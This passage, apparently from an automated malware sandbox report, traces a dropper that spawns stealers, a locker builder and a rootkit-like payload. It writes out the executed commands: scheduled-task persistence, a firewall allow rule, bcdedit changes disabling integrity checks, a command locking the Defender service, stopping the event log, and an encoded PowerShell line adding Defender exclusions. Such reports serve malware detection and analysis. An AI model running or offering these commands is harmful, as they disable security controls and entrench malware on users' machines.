b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exee0cbefcb1af40c7d4aff4aca26621a98.exee0cbefcb1af40c7d4aff4aca26621a98.exe

pid	process
1540	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
1540	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
1092
1092
1092
1092
1092
1092
2376	e0cbefcb1af40c7d4aff4aca26621a98.exe
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
2732	e0cbefcb1af40c7d4aff4aca26621a98.exe
2732	e0cbefcb1af40c7d4aff4aca26621a98.exe
2732	e0cbefcb1af40c7d4aff4aca26621a98.exe
2732	e0cbefcb1af40c7d4aff4aca26621a98.exe
2732	e0cbefcb1af40c7d4aff4aca26621a98.exe
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092
1092

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

476
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe

pid process

1540 f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe

pid	process
476

Suspicious use of AdjustPrivilegeToken 20 IoCs

Processes:

4363463463464363463463463.bin.exee0cbefcb1af40c7d4aff4aca26621a98.execsrss.exehncc.exejsc.exeRegAsm.exepowershell.exenpp.8.6.2.Installer.x64.exeexplorer.exesc.exe

description	pid	process
Token: SeDebugPrivilege	3048	4363463463464363463463463.bin.exe
Token: SeDebugPrivilege	2376	e0cbefcb1af40c7d4aff4aca26621a98.exe
Token: SeImpersonatePrivilege	2376	e0cbefcb1af40c7d4aff4aca26621a98.exe
Token: SeSystemEnvironmentPrivilege	3012	csrss.exe
Token: SeShutdownPrivilege	1092
Token: SeShutdownPrivilege	1092
Token: SeDebugPrivilege	1524	hncc.exe
Token: SeShutdownPrivilege	1092
Token: SeShutdownPrivilege	1092
Token: SeShutdownPrivilege	1092
Token: SeDebugPrivilege	2196	jsc.exe
Token: SeShutdownPrivilege	1092
Token: SeShutdownPrivilege	1092
Token: SeDebugPrivilege	1756	RegAsm.exe
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	1216	npp.8.6.2.Installer.x64.exe
Token: SeLockMemoryPrivilege	2524	explorer.exe
Token: SeSecurityPrivilege	2612	sc.exe
Token: SeSecurityPrivilege	2612	sc.exe
Token: SeShutdownPrivilege	1092

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

WinlockerBuilderv5.exe6.exe

pid process

332 WinlockerBuilderv5.exe
332 WinlockerBuilderv5.exe
1260 6.exe

pid	process
332	WinlockerBuilderv5.exe
332	WinlockerBuilderv5.exe
1260	6.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4363463463464363463463463.bin.exebin.exebuildcosta.exetaskeng.exef4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe

description	pid	process	target process
PID 3048 wrote to memory of 2740	3048	4363463463464363463463463.bin.exe	bin.exe
PID 3048 wrote to memory of 2740	3048	4363463463464363463463463.bin.exe	bin.exe
PID 3048 wrote to memory of 2740	3048	4363463463464363463463463.bin.exe	bin.exe
PID 3048 wrote to memory of 2740	3048	4363463463464363463463463.bin.exe	bin.exe
PID 2740 wrote to memory of 1248	2740	bin.exe	AppLaunch.exe
PID 2740 wrote to memory of 1248	2740	bin.exe	AppLaunch.exe
PID 2740 wrote to memory of 1248	2740	bin.exe	AppLaunch.exe
PID 2740 wrote to memory of 1248	2740	bin.exe	AppLaunch.exe
PID 2740 wrote to memory of 1248	2740	bin.exe	AppLaunch.exe
PID 2740 wrote to memory of 1248	2740	bin.exe	AppLaunch.exe
PID 2740 wrote to memory of 1248	2740	bin.exe	AppLaunch.exe
PID 2740 wrote to memory of 1248	2740	bin.exe	AppLaunch.exe
PID 2740 wrote to memory of 1248	2740	bin.exe	AppLaunch.exe
PID 2740 wrote to memory of 1248	2740	bin.exe	AppLaunch.exe
PID 2740 wrote to memory of 1248	2740	bin.exe	AppLaunch.exe
PID 2740 wrote to memory of 1248	2740	bin.exe	AppLaunch.exe
PID 2740 wrote to memory of 1248	2740	bin.exe	AppLaunch.exe
PID 3048 wrote to memory of 280	3048	4363463463464363463463463.bin.exe	2024.exe
PID 3048 wrote to memory of 280	3048	4363463463464363463463463.bin.exe	2024.exe
PID 3048 wrote to memory of 280	3048	4363463463464363463463463.bin.exe	2024.exe
PID 3048 wrote to memory of 280	3048	4363463463464363463463463.bin.exe	2024.exe
PID 3048 wrote to memory of 2464	3048	4363463463464363463463463.bin.exe	cs_maltest.exe
PID 3048 wrote to memory of 2464	3048	4363463463464363463463463.bin.exe	cs_maltest.exe
PID 3048 wrote to memory of 2464	3048	4363463463464363463463463.bin.exe	cs_maltest.exe
PID 3048 wrote to memory of 2464	3048	4363463463464363463463463.bin.exe	cs_maltest.exe
PID 3048 wrote to memory of 1200	3048	4363463463464363463463463.bin.exe	bc_memories_from_the_mcp.exe
PID 3048 wrote to memory of 1200	3048	4363463463464363463463463.bin.exe	bc_memories_from_the_mcp.exe
PID 3048 wrote to memory of 1200	3048	4363463463464363463463463.bin.exe	bc_memories_from_the_mcp.exe
PID 3048 wrote to memory of 1200	3048	4363463463464363463463463.bin.exe	bc_memories_from_the_mcp.exe
PID 3048 wrote to memory of 1084	3048	4363463463464363463463463.bin.exe	asas.exe
PID 3048 wrote to memory of 1084	3048	4363463463464363463463463.bin.exe	asas.exe
PID 3048 wrote to memory of 1084	3048	4363463463464363463463463.bin.exe	asas.exe
PID 3048 wrote to memory of 1084	3048	4363463463464363463463463.bin.exe	asas.exe
PID 3048 wrote to memory of 2072	3048	4363463463464363463463463.bin.exe	hv.exe
PID 3048 wrote to memory of 2072	3048	4363463463464363463463463.bin.exe	hv.exe
PID 3048 wrote to memory of 2072	3048	4363463463464363463463463.bin.exe	hv.exe
PID 3048 wrote to memory of 2072	3048	4363463463464363463463463.bin.exe	hv.exe
PID 3048 wrote to memory of 2220	3048	4363463463464363463463463.bin.exe	buildcosta.exe
PID 3048 wrote to memory of 2220	3048	4363463463464363463463463.bin.exe	buildcosta.exe
PID 3048 wrote to memory of 2220	3048	4363463463464363463463463.bin.exe	buildcosta.exe
PID 3048 wrote to memory of 2220	3048	4363463463464363463463463.bin.exe	buildcosta.exe
PID 2220 wrote to memory of 2540	2220	buildcosta.exe	schtasks.exe
PID 2220 wrote to memory of 2540	2220	buildcosta.exe	schtasks.exe
PID 2220 wrote to memory of 2540	2220	buildcosta.exe	schtasks.exe
PID 2220 wrote to memory of 2540	2220	buildcosta.exe	schtasks.exe
PID 3048 wrote to memory of 1456	3048	4363463463464363463463463.bin.exe	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
PID 3048 wrote to memory of 1456	3048	4363463463464363463463463.bin.exe	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
PID 3048 wrote to memory of 1456	3048	4363463463464363463463463.bin.exe	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
PID 3048 wrote to memory of 1456	3048	4363463463464363463463463.bin.exe	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
PID 2488 wrote to memory of 1564	2488	taskeng.exe	buildcosta.exe
PID 2488 wrote to memory of 1564	2488	taskeng.exe	buildcosta.exe
PID 2488 wrote to memory of 1564	2488	taskeng.exe	buildcosta.exe
PID 2488 wrote to memory of 1564	2488	taskeng.exe	buildcosta.exe
PID 1456 wrote to memory of 1540	1456	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
PID 1456 wrote to memory of 1540	1456	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
PID 1456 wrote to memory of 1540	1456	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
PID 1456 wrote to memory of 1540	1456	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
PID 1456 wrote to memory of 1540	1456	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
PID 1456 wrote to memory of 1540	1456	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
PID 1456 wrote to memory of 1540	1456	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
PID 2220 wrote to memory of 2376	2220	buildcosta.exe	e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 2220 wrote to memory of 2376	2220	buildcosta.exe	e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 2220 wrote to memory of 2376	2220	buildcosta.exe	e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 2220 wrote to memory of 2376	2220	buildcosta.exe	e0cbefcb1af40c7d4aff4aca26621a98.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.bin.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.bin.exe"
1⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3048

C:\Users\Admin\AppData\Local\Temp\Files\bin.exe
"C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2740

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:1248

C:\Users\Admin\AppData\Local\Temp\Files\2024.exe
"C:\Users\Admin\AppData\Local\Temp\Files\2024.exe"
2⤵
- Executes dropped EXE
PID:280

C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe"
2⤵
- Executes dropped EXE
PID:2464

C:\Users\Admin\AppData\Local\Temp\Files\bc_memories_from_the_mcp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\bc_memories_from_the_mcp.exe"
2⤵
- Executes dropped EXE
PID:1200

C:\Users\Admin\AppData\Local\Temp\Files\asas.exe
"C:\Users\Admin\AppData\Local\Temp\Files\asas.exe"
2⤵
- Executes dropped EXE
PID:1084

C:\Windows\System32\werfault.exe
\??\C:\Windows\System32\werfault.exe
3⤵
PID:1944

C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
"C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2072

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2196

C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
"C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2220

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN buildcosta.exe /TR "C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe" /F
3⤵
- Creates scheduled task(s)
PID:2540

C:\Users\Admin\AppData\Local\Temp\1000130001\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\1000130001\e0cbefcb1af40c7d4aff4aca26621a98.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2376

C:\Users\Admin\AppData\Local\Temp\1000130001\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\1000130001\e0cbefcb1af40c7d4aff4aca26621a98.exe"
4⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2732

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:3008

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:3044

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:3012

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:1512

C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
6⤵
PID:772

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:340

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
7⤵
- Modifies boot configuration data using bcdedit
PID:1156

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
7⤵
- Modifies boot configuration data using bcdedit
PID:2780

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
7⤵
- Modifies boot configuration data using bcdedit
PID:868

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
7⤵
- Modifies boot configuration data using bcdedit
PID:1896

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
7⤵
- Modifies boot configuration data using bcdedit
PID:2016

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
7⤵
- Modifies boot configuration data using bcdedit
PID:2560

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
7⤵
- Modifies boot configuration data using bcdedit
PID:2976

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
7⤵
- Modifies boot configuration data using bcdedit
PID:2300

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
7⤵
- Modifies boot configuration data using bcdedit
PID:1552

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
7⤵
- Modifies boot configuration data using bcdedit
PID:1484

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
7⤵
- Modifies boot configuration data using bcdedit
PID:2592

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
7⤵
- Modifies boot configuration data using bcdedit
PID:788

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
7⤵
- Modifies boot configuration data using bcdedit
PID:3060

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
- Executes dropped EXE
PID:1580

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
6⤵
- Modifies boot configuration data using bcdedit
PID:376

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
6⤵
- Executes dropped EXE
PID:2608

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:2332

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
6⤵
- Executes dropped EXE
PID:800

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
PID:1788

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:2612

C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
"C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1456

C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
"C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe"
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1540

C:\Users\Admin\AppData\Local\Temp\Files\WinlockerBuilderv5.exe
"C:\Users\Admin\AppData\Local\Temp\Files\WinlockerBuilderv5.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:332

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 652
3⤵
PID:2484

C:\Users\Admin\AppData\Local\Temp\Files\Goldprime.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Goldprime.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:660

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1756

C:\Users\Admin\AppData\Local\Temp\Files\hncc.exe
"C:\Users\Admin\AppData\Local\Temp\Files\hncc.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwAaABuAGMAYwAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAaABuAGMAYwAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAaABuAGMAYwAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAaABuAGMAYwAuAGUAeABlAA==
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2680

C:\Users\Admin\AppData\Local\Temp\Files\hncc.exe
C:\Users\Admin\AppData\Local\Temp\Files\hncc.exe
3⤵
PID:3060

C:\Users\Admin\AppData\Local\Temp\Files\6.exe
"C:\Users\Admin\AppData\Local\Temp\Files\6.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1260

C:\Users\Admin\AppData\Local\Temp\Files\art22.exe
"C:\Users\Admin\AppData\Local\Temp\Files\art22.exe"
2⤵
- Executes dropped EXE
PID:2428

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "XGRXZRAP"
3⤵
- Launches sc.exe
PID:1428

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "XGRXZRAP" binpath= "C:\ProgramData\wdkmvkocxuib\smazgcisoglo.exe" start= "auto"
3⤵
- Launches sc.exe
PID:2160

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:1828

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "XGRXZRAP"
3⤵
- Launches sc.exe
PID:2016

C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_4.exe
"C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_4.exe"
2⤵
- Executes dropped EXE
PID:1780

C:\Users\Admin\AppData\Local\Temp\Files\npp86Installerx64.exe
"C:\Users\Admin\AppData\Local\Temp\Files\npp86Installerx64.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:1156

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\npp.8.6.2.Installer.x64.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\npp.8.6.2.Installer.x64.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1216

C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe
"C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1900

C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe
"C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe"
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:1668

C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe
"C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1568

C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe
"C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2408

C:\Users\Admin\AppData\Local\Temp\Files\rty49.exe
"C:\Users\Admin\AppData\Local\Temp\Files\rty49.exe"
